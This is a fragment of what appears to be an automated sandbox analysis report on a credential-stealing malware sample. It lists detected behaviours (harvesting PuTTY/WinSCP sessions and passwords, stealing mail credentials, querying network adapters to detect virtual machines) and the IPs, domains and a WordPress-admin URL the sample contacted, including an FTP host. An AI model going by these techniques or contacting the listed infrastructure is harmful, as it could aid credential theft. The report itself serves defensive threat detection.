Bulgaria 19->29 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->37 39 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->39 41 Tries to steal Mail credentials (via file / registry access) 19->41 43 4 other signatures 19->43 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.185.145.188
 b3solutionscws.com United States
46606 UNIFIEDLAYER-AS-1US false
185.31.121.136
 ftp.mcmprint.net Bulgaria
199364 RAX-ASBG false

Contacted Domains

Name IP Active
ftp.mcmprint.net 185.31.121.136 true
b3solutionscws.com 192.185.145.188 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16 false
  • Avira URL Cloud: safe
 unknown